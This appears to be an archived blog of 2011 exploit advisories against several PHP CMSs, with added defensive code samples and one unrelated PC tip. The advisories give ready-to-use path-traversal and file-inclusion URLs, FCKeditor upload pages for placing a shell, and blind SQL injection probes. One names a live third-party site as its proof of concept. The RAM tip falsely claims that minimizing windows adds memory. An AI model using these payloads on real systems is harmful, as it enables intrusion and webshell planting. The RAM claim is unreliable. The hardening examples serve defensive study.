[!] http://host/path_to_oscss/admin/includes/template/oscss/gabarit-2.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
or
[!] http://host/path_to_oscss/admin/includes/template/defaut/gabarit-view.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
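Both gabarit files build the include path straight from $page_admin. The following is an added example, not osCSS's own code: a guarded resolver that allowlists the page identifier by pattern and checks with realpath() that the resolved file stays inside the content directory. The function name, the directory layout and the temporary demo directory are assumptions.

```php
<?php
// Added example (not osCSS's own code): a guarded replacement for the
// @include(DIR_WS_INCLUDES . 'content/' . $page_admin . '.top.inc') line in
// gabarit-view.php and gabarit-2.php. The page identifier is allowlisted by
// pattern and the resolved path is checked to stay inside the content
// directory. Function name, directory layout and the temporary demo
// directory are assumptions.
declare(strict_types=1);

/**
 * Returns the absolute path of the fragment for $page, or null when the
 * request must be refused. $contentDir is the directory the include must
 * never leave.
 */
function resolve_admin_page(string $page, string $contentDir): ?string
{
    // A page name is a plain identifier: slashes, dots, "%" and NUL bytes
    // do not survive this pattern, so neither does any traversal sequence.
    if (!preg_match('/\A[a-z0-9_-]{1,64}\z/i', $page)) {
        return null;
    }
    $base = realpath($contentDir);
    if ($base === false) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $page . '.top.inc');
    // realpath() collapses ".." and follows symlinks; the result must still
    // start with the content directory (defence in depth behind the regex).
    if ($candidate === false || strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

// How a template would use it (hypothetical call site):
//   $path = resolve_admin_page($_GET['page_admin'] ?? '', DIR_WS_INCLUDES . 'content');
//   if ($path === null) { http_response_code(400); exit; }
//   include $path;

// Demonstration on a constructed content directory.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'oscss_demo_' . bin2hex(random_bytes(4));
$contentDir = $root . DIRECTORY_SEPARATOR . 'content';
mkdir($contentDir, 0700, true);
$fragment = $contentDir . DIRECTORY_SEPARATOR . 'index.top.inc';
file_put_contents($fragment, "<?php // constructed fragment\n");

$requests = [
    'index',                        // legitimate page
    '../../../../windows/win.ini',  // the traversal from the PoC above
    "index\0.php",                  // identifier with an embedded NUL byte
    'missing',                      // well-formed but nonexistent page
];
foreach ($requests as $page) {
    $resolved = resolve_admin_page($page, $contentDir);
    printf("%-30s %s\n", addcslashes($page, "\0"), $resolved ?? 'REFUSED');
}

unlink($fragment);
rmdir($contentDir);
rmdir($root);
```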
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
2011/03/28
webEdition CMS Version 6.1.0.2 (DOCUMENT_ROOT) Local File Inclusion vulnerability
===================================================================
webEdition CMS (DOCUMENT_ROOT) Local File Inclusion vulnerability
===================================================================
Software: webEdition CMS Version 6.1.0.2
Vendor: http://www.webedition.org
Vuln Type: Local File Inclusion
Download link: http://sourceforge.net/projects/webedition/files/webEdition/6.1.0.2/webEdition_6102.tar.gz/download
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
Gratz: welcome back YOGYACARDERLINK.web.id !!!
===================================================================
description:
webEdition Version 6.1.0.2
webEdition is a web content management system licensed under the GPL.
For system requirements, installation and upgrade details, see the file INSTALL and the information available on our website
http://www.webedition.org
See the webEdition/license folder for license information.
See INSTALL for quick installation instructions.
----------------------------------
Vulnerability code:
index.php
/*****************************************************************************
* INITIALIZATION
*****************************************************************************/
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/conf/we_conf.inc.php");
require_once($_SERVER['DOCUMENT_ROOT'] . "/webEdition/we/include/we_message_reporting/we_message_reporting.class.php");
/*****************************************************************************
* INCLUDES
*****************************************************************************/
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_html_tools.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_browser_check.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_button.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_htmlElement.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_htmlTable.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/start.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/alert.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/global.inc.php");
$ignore_browser = isset($_REQUEST["ignore_browser"]) && ($_REQUEST["ignore_browser"] === "true");
/*****************************************************************************
----------------------------------
exploit & p0c
[!] http://host/webEdition/index.php?DOCUMENT_ROOT= [lfi]
or
[!] http://host/path_to_webEdition/index.php?DOCUMENT_ROOT= [lfi]
NB: it seems other vulnerabilities are also present, such as LFD, XSS, maybe RFI, etc., but I haven't checked or tested them yet.
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
2011/03/20
CMS Lokomedia 1.5 Arbitrary file upload vulnerability
===================================================================
CMS Lokomedia 1.5 Arbitrary file upload vulnerability
===================================================================
Software: CMS Lokomedia
Vendor: http://bukulokomedia.com/home
Vuln Type: Arbitrary file upload
Download link: http://bukulokomedia.com/lokomedia-1.5.rar
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
DORK: use your skill and play your imagination :P
Gratz:
- Kuris : so your status says married already, babe.. and you didn't even invite me..
- Richie RebelgiRL : (Limited edition.. lol) life is never flat, so enjoy this life, mate ^_^
===================================================================
----------------------------------
exploit & p0c
[!] http://host/path_to_lokomedia/tinymcpuk/filemanager/browser.html // upload your file here
or
[!] http://host/tinymcpuk/filemanager/browser.html
or
[!] http://host//tinymcpuk/filemanager/frmupload.html
or
[!] http://host/path_to_lokomedia/tinymcpuk/filemanager/frmupload.html
your shell or file will be placed here
/*------------------------------------------------------------------------------*/
/* Path to user files relative to the document root (no trailing slash) */
/*------------------------------------------------------------------------------*/
$fckphp_config['UserFilesPath'] = "./lokomedia/tinymcpuk/gambar" ; // <= here
/*==============================================================================*/
/* Once the site is online, change line 47 to the following setting:
$fckphp_config['UserFilesPath'] = "./tinymcpuk/gambar" ; */ // <= or here
----------------------------------
live poc : http://www.ikafela.com./tinymcpuk/filemanager/browser.html
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
2011/03/19
CMS Balitbang v 3.3 Arbitrary file upload vulnerability
===================================================================
CMS Balitbang v.3.3 Arbitrary file upload vulnerability
===================================================================
Software: CMS Balitbang
Vendor: www.kajianwebsite.org
Vuln Type: Arbitrary file upload
Download link: http://www.kajianwebsite.org/download/CMS%20versi%203.3.zip
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
Gratz: xx_user , kuris , and YOU !!!
===================================================================
description:
CMS Balitbang is a content management system for educational websites.
Its name is not really CMS Balitbang, but because this CMS was developed by Balitbang Kemendiknas it is better known by that name. CMS Balitbang is intended for Indonesian education, especially for schools that do not yet have a school website. The hope is that in the future every school in Indonesia will have a web-based information system that many people can access.
----------------------------------
Vulnerability details:
CMS Balitbang uses an old version of FCKeditor for file upload by all users, and as is well known, old versions of FCKeditor have a vulnerability: an attacker might be able to upload arbitrary files containing malicious PHP code because multiple file extensions aren't properly checked.
Here is the code:
/webtemp/functions/editor/filemanager/connectors/php/config.php
global $Config ;
// SECURITY: You must explicitly enable this "connector". (Set it to "true").
// WARNING: don't just set "$Config['Enabled'] = true ;", you must be sure that only
// authenticated users can access this file or use some kind of session checking.
$Config['Enabled'] = true ; // <= 1
---
// Path to user files relative to the document root.
$Config['UserFilesPath'] = 'http://localhost/webtemp/userfiles/' ; // <= here is the path where the attacker's file or shell backdoor will be placed.
// following setting enabled.
$Config['ForceSingleExtension'] = true ; // <= 2
$Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ; // <= 3
---
With the default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code because multiple file extensions aren't properly checked.
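The following is an added example, not FCKeditor's or CMS Balitbang's own code: the filename check an upload connector should apply before touching the disk, covering every dot-separated segment rather than only the last one, plus a server-generated storage name so the client's name never reaches the userfiles directory. ALLOWED_UPLOAD_EXTENSIONS is a subset of the 'File' allowlist quoted above; the executable-extension denylist, the session key and the function names are assumptions.

```php
<?php
// Added example (not FCKeditor's or CMS Balitbang's own code): a hardened
// upload-name check and a server-generated storage name. The allowlist is
// a subset of the advisory's config.php 'File' list; the executable
// denylist, session key and function names are assumptions.
declare(strict_types=1);

const ALLOWED_UPLOAD_EXTENSIONS = [
    '7z', 'avi', 'bmp', 'csv', 'doc', 'gif', 'jpeg', 'jpg',
    'pdf', 'png', 'rar', 'txt', 'xls', 'zip',
];

// Extensions a typical PHP web server hands to a script handler, plus the
// Apache per-directory config file. None may appear in ANY segment of the
// name, not only the last one: Apache with mod_mime evaluates every
// extension of a name such as "shell.php.txt".
const EXECUTABLE_EXTENSIONS = [
    'php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar', 'htaccess',
];

/**
 * True when $name is a bare filename whose final extension is allowed and
 * none of its dot-separated segments is executable.
 */
function is_acceptable_upload_name(string $name): bool
{
    // Path separators and NUL bytes are never legitimate in an upload name.
    if ($name === '' || strpos($name, "\0") !== false
        || strpos($name, '/') !== false || strpos($name, '\\') !== false) {
        return false;
    }
    $segments = explode('.', strtolower($name));
    // Need a stem plus at least one extension; this also rejects dotfiles.
    if (count($segments) < 2 || $segments[0] === '') {
        return false;
    }
    foreach (array_slice($segments, 1) as $ext) {
        if (in_array($ext, EXECUTABLE_EXTENSIONS, true)) {
            return false;
        }
    }
    return in_array(end($segments), ALLOWED_UPLOAD_EXTENSIONS, true);
}

/**
 * Name to store the file under instead of the client-supplied one: a random
 * stem plus the single validated extension. Null means "reject the upload".
 */
function storage_name_for(string $clientName): ?string
{
    if (!is_acceptable_upload_name($clientName)) {
        return null;
    }
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return bin2hex(random_bytes(8)) . '.' . $ext;
}

// Connector-side settings that belong with this check, using the option
// names quoted in the advisory (the session key is an assumption):
//   $Config['Enabled'] = isset($_SESSION['admin_id']); // authenticated only
//   $Config['ForceSingleExtension'] = true;

// Constructed sample names of the kinds an upload form receives.
$samples = [
    'report.pdf', 'PHOTO.JPG', 'shell.php', 'shell.php.txt',
    'shell.phtml', '.htaccess', '../escape.png', "note.txt\0.php",
];
foreach ($samples as $name) {
    printf("%-18s %s\n", addcslashes($name, "\0"), storage_name_for($name) ?? 'REJECTED');
}
```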
----------------------------------
exploit & p0c
[!] http://host//webtemp/functions/editor/filemanager/connectors/uploadtest.html // upload your file here
or
[!] http://host/path_to_CMSBalitbang/functions/editor/filemanager/connectors/uploadtest.html
your shell or file will be placed here
[!] http://localhost/webtemp/userfiles/ <= here
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
Trick to Increase Your Computer's RAM Speed
Many users asked me to find a ploy to boost their computer speed. After a long search I found a ploy to speed up your PC and posted it on the web.
The procedure is as follows:
1). Start any application, say Word. Open some large documents.
2). Press CTRL+SHIFT+ESC to open Windows Task Manager, click the Processes tab and sort the list in descending order on Mem Usage. You will notice that WINWORD.EXE is somewhere at the top, using multiple MBs of memory.
3). Now switch to Word and simply minimize it. (Don't use the Minimize All Windows option of the task bar.)
4). Now go back to the Windows Task Manager and see where WINWORD.EXE is listed. Most likely you will not find it at the top; you will typically have to scroll to the bottom of the list to find Word. Now check the amount of RAM it is using. Surprised? The memory usage has dropped by a huge amount.
5). Minimize each application that you are not currently working on by clicking its Minimize button and you can increase the amount of free RAM by a substantial margin. Depending on the number and type of applications you use together, the difference can be as much as 50 percent of additional RAM.
In any multitasking system, minimizing an application means that it won't be used by the user right now. Consequently, the OS automatically makes the application use virtual memory and keeps only a bare minimum of its code in physical RAM.
2011/03/18
Tugux CMS (nid) BLIND sql injection vulnerability
===================================================================
Tugux CMS (nid) BLIND sql injection vulnerability
===================================================================
Software: Tugux CMS
Vendor: www.tugux.com
Vuln Type: Blind SQL Injection
Download link: http://sourceforge.net/projects/tuguxcms/files/tuguxCMS_v.1.0_final.rar/download
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
===================================================================
exploit & p0c
[!] latest.php?nid=[valid nid]
Example p0c
[!] http://host/latest.php?nid=9 <= True
[!] http://host/latest.php?nid=-9 <= False
[+] http://host:3306 <= download the file, save it and open it in c++ or WordPad; it will show the MySQL version
[!] sample: http://www.tugux.com:3306 result : 5.0.92-community (uses version 5.0.92) :D
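Why a browser pointed at port 3306 ends up with the version string: MySQL sends its Protocol::HandshakeV10 greeting before any authentication, and the server version is a NUL-terminated string right after the protocol byte. The parser below is an added example, not part of the advisory, run over a constructed packet; the connection id, auth data and flags are made up, only the version string is the one quoted above. The defensive question it supports is whether a database of yours answers on a public interface at all (bind-address and firewall, not the version, are the fix).

```python
import struct

def parse_handshake(data: bytes) -> dict:
    """Parse the start of a MySQL Protocol::HandshakeV10 packet.

    Layout (little-endian): 3-byte payload length, 1-byte sequence id, then
    1-byte protocol version (10), NUL-terminated server version, 4-byte
    connection id, 8 bytes auth-plugin-data-part-1, 1 filler byte, 2 bytes
    lower capability flags, 1 charset byte, 2 status bytes. Only the fields
    needed to identify the server are returned.
    """
    if len(data) < 5:
        raise ValueError("packet too short")
    payload_len = int.from_bytes(data[0:3], "little")
    payload = data[4:4 + payload_len]
    if len(payload) != payload_len or payload[0] != 10:
        raise ValueError("not a HandshakeV10 packet")
    end = payload.index(b"\x00", 1)          # end of the server version string
    server_version = payload[1:end].decode("ascii")
    pos = end + 1
    (connection_id,) = struct.unpack_from("<I", payload, pos)
    pos += 4 + 8 + 1                         # skip auth data part 1 and filler
    (capabilities_low,) = struct.unpack_from("<H", payload, pos)
    return {
        "protocol": payload[0],
        "server_version": server_version,
        "connection_id": connection_id,
        "capabilities_low": capabilities_low,
    }

def build_handshake(version: str, connection_id: int) -> bytes:
    """Build a constructed HandshakeV10 packet for offline testing (not real server output)."""
    payload = (
        b"\x0a" + version.encode("ascii") + b"\x00"
        + struct.pack("<I", connection_id)
        + b"12345678" + b"\x00"              # auth-plugin-data-part-1 + filler (constructed)
        + struct.pack("<H", 0xF7FF)          # lower capability flags (constructed)
        + b"\x21"                            # charset utf8_general_ci
        + struct.pack("<H", 0x0002)          # status: SERVER_STATUS_AUTOCOMMIT
    )
    return len(payload).to_bytes(3, "little") + b"\x00" + payload

if __name__ == "__main__":
    print(parse_handshake(build_handshake("5.0.92-community", 42)))
```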
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
2011/01/21
phpcms V9 Blind SQL Injection Vulnerability
=================================================================
phpcms V9 BLind SQL Injection Vulnerability
=================================================================
Software: phpcms V9
Vendor: www.phpcms.cn
Vuln Type: Blind SQL Injection
Download link: http://www.phpcms.cn/2010/1229/326.html
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
=================================================================
exploit & p0c
[!] index.php?m=content&c=rss&catid=[valid catid]
Example p0c
[!] http://host/index.php?m=content&c=rss&catid=10 <= True
[!] http://host/index.php?m=content&c=rss&catid=-10 <= False
[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)
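Both the Tugux `nid` and the phpcms `catid` advisories above describe the same flaw class: a numeric request parameter concatenated into a query. The example below is added here and is not code from either CMS; it uses a constructed in-memory SQLite table with the ids from the advisories. A negative id returns nothing in both versions, so the appended boolean condition is what actually separates concatenation from a validated, bound parameter.

```python
import re
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the CMS content table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE content (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO content VALUES (?, ?)",
                     [(9, "first post"), (10, "second post")])
    return conn

def latest_vulnerable(conn: sqlite3.Connection, raw_id: str) -> list:
    """Concatenates the request parameter into SQL (the flaw class the advisories describe)."""
    sql = "SELECT title FROM content WHERE id = " + raw_id
    return [row[0] for row in conn.execute(sql)]

def parse_id(raw_id: str):
    """Accept only a plain decimal integer; anything else is rejected before it reaches SQL."""
    return int(raw_id) if re.fullmatch(r"-?\d{1,10}", raw_id) else None

def latest_fixed(conn: sqlite3.Connection, raw_id: str) -> list:
    """Validates the parameter and binds it, so its value can never alter the WHERE clause."""
    id_ = parse_id(raw_id)
    if id_ is None:
        return []          # a real handler would answer 400 here and log the attempt
    return [row[0] for row in
            conn.execute("SELECT title FROM content WHERE id = ?", (id_,))]

def probe(fn, conn: sqlite3.Connection) -> dict:
    """Run the true/false pair from the advisories plus an appended boolean condition."""
    return {p: fn(conn, p) for p in ("9", "-9", "9 AND 1=1", "9 AND 1=0")}

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", probe(latest_vulnerable, conn))
    print("fixed:     ", probe(latest_fixed, conn))
```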
=================================================================
Nothing Impossible In This World Even Nobody`s Perfect
=================================================================
=========================| -=[ E0F ]=- |=========================
2011/01/10
maximus-cms (fckeditor) Arbitrary File Upload Vulnerability
####################################################################
maximus-cms (fckeditor) Arbitrary File Upload Vulnerability
####################################################################
____ __ __ __
/\ _`\ /\ \ __ /\ \__/\ \
\ \ \L\_\__ __ ___\ \ \/'\ /\_\ ___ __ \ \ ,_\ \ \___ __
\ \ _\/\ \/\ \ /'___\ \ , < \/\ \ /' _ `\ /'_ `\ \ \ \/\ \ _ `\ /'__`\
\ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\ __/
\ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____\
\/_/ \/___/ \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/
/\____/
\_/__/
__ __ __ ______ Author:eidelweiss
/\ \ __/\ \ /\ \ /\ _ \
\ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \ _____ _____ ____
\ \ \ \ \ \ \ /'__`\ \ '__`\ \ \ __ \/\ '__`\/\ '__`\ /',__\
\ \ \_/ \_\ \/\ __/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
\ `\___x___/\ \____\\ \_,__/ \ \_\ \_\ \ ,__/\ \ ,__/\/\____/
'\/__//__/ \/____/ \/___/ \/_/\/_/\ \ \/ \ \ \/ \/___/
\ \_\ \ \_\
\/_/ \/_/
| |
/|_________________________________________________________________________|\
/ \
/===============================================================================\
|Exploit Title: maximus-cms (fckeditor) Arbitrary File Upload Vulnerability |
|develop: http://www.php-maximus.org |
|Download: http://ftp1.toocharger.com/scgdnLI/maximus-cms-2008_5129.zip |
|Version: Maximus 2008 CMS: Web Portal System (v.1.1.2) |
|Tested On: Live site |
|Dork: use your skill and play your imagination :P |
|Author: eidelweiss |
|contact: eidelweiss[at]windowslive[dot]com |
|Home: http://www.eidelweiss.info |
| |
| |
| |
\===============================================================================/
/ NOTHING IMPOSSIBLE IN THIS WORLD EVEN NOBODY`s PERFECT \
---------------------------------------------------------------------------------
exploit # path/html/FCKeditor/editor/filemanager/connectors/uploadtest.html
[!] first find the target host
ex: www.site.com or www.target.com/maximus
then # http://site.com/FCKeditor/editor/filemanager/connectors/uploadtest.html#
[!] select # "php" as "File Uploader" to use... and select "file" as Resource Type
[!] Upload there Hacked.txt or whatever.txt and copy the output link, or
[!] after an upload without any errors your file will be at: /FCKeditor/upload/
ex: http://site.com/FCKeditor/upload/whatever.txt
NB: remote shell upload also possible !!!
Read the config.php file in "/FCKeditor/editor/filemanager/connectors/php/"
----------
$Config['Enabled'] = true ; // <=
// Path to user files relative to the document root.
$Config['UserFilesPath'] = '/FCKeditor/upload/' ;
----------
and also $Config['AllowedExtensions']['File']
With the default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code because multiple file extensions aren't properly checked.
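The `ForceSingleExtension` setting quoted in these FCKeditor advisories is what turns `shell.php.txt` into `shell_php.txt`; with it off, only the final extension is compared against the allow-list and the stored name keeps every extension. The following is an added example, not FCKeditor's or the CMS's code: a Python mirror of that check (the regex is the one the PHP connector uses, the allow-list is a subset of the `$Config['AllowedExtensions']['File']` list quoted above) beside a stricter variant that rejects an executable extension anywhere in the chain. Serving the upload directory with script execution disabled is the complementary control.

```python
import os
import re

# Subset of $Config['AllowedExtensions']['File'] from the quoted connector config.
ALLOWED_FILE_EXT = {"7z", "csv", "doc", "gif", "jpg", "jpeg", "pdf", "png", "txt", "zip"}

# Extensions a web server may hand to the PHP interpreter even when not last (assumed list).
EXECUTABLE_EXT = {"php", "php3", "php4", "php5", "phtml", "phar"}

def force_single_extension(name: str) -> str:
    """Mirror of FCKeditor's ForceSingleExtension: every dot but the last becomes '_'."""
    return re.sub(r"\.(?![^.]*$)", "_", name)

def check_upload(name: str, force_single: bool, allowed=ALLOWED_FILE_EXT):
    """Return (accepted, stored_name); stored_name is None when the upload is refused.

    force_single=False reproduces the weak setting: only the final extension is
    compared with the allow-list, so 'shell.php.txt' passes and keeps both extensions.
    """
    name = os.path.basename(name.replace("\\", "/"))     # drop any directory part
    if force_single:
        name = force_single_extension(name)
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in allowed:
        return False, None
    return True, name

def check_upload_hardened(name: str, allowed=ALLOWED_FILE_EXT):
    """Stricter variant: lowercase, single extension, and no executable extension in the chain."""
    base = os.path.basename(name.replace("\\", "/")).lower()
    if set(base.split(".")[1:]) & EXECUTABLE_EXT:       # any extension, not just the last
        return False, None
    return check_upload(base, force_single=True, allowed=allowed)

if __name__ == "__main__":
    for candidate in ("shell.php.txt", "shell.php", "../../shell.txt", "Report.Final.PDF"):
        print(candidate, check_upload(candidate, False), check_upload(candidate, True),
              check_upload_hardened(candidate))
```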
=========================| -=[ E0F ]=- |=================================